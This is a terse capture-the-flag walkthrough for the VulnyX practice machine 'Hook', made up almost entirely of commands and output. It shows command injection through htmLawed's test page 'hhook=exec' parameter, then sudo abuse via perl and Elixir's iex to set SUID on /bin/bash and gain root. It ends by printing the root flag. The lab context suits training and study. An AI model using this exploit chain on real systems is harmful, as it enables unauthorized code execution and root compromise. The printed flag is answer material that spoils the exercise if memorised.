靶场练习-vulnyx：Hook

curl -s -d 'sid=foo&hhook=exec&text=这里写CMD' -b 'sid=foo' http://localhost/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'

www-data@hook:/var/www/html/htmLawed$ sudo -u noname perl -e 'exec "/bin/sh";'

noname@hook:/var/www/html/htmLawed$ sudo iex

Interactive Elixir (1.14.0) - press Ctrl+C to exit (type h() ENTER for help)

iex(1)> System.cmd("sudo",["chmod","+s","/bin/bash"])

{"", 0}

iex(1)> ^C

BREAK: (a)bort (A)bort with dump (c)ontinue (p)roc info (i)nfo

       (l)oaded (v)ersion (k)ill (D)b-tables (d)istribution

a

noname@hook:/var/www/html/htmLawed$ bash -p

bash-5.2# cat /root/root.txt 

708883f44e1b0e57c8a501e176fad8a9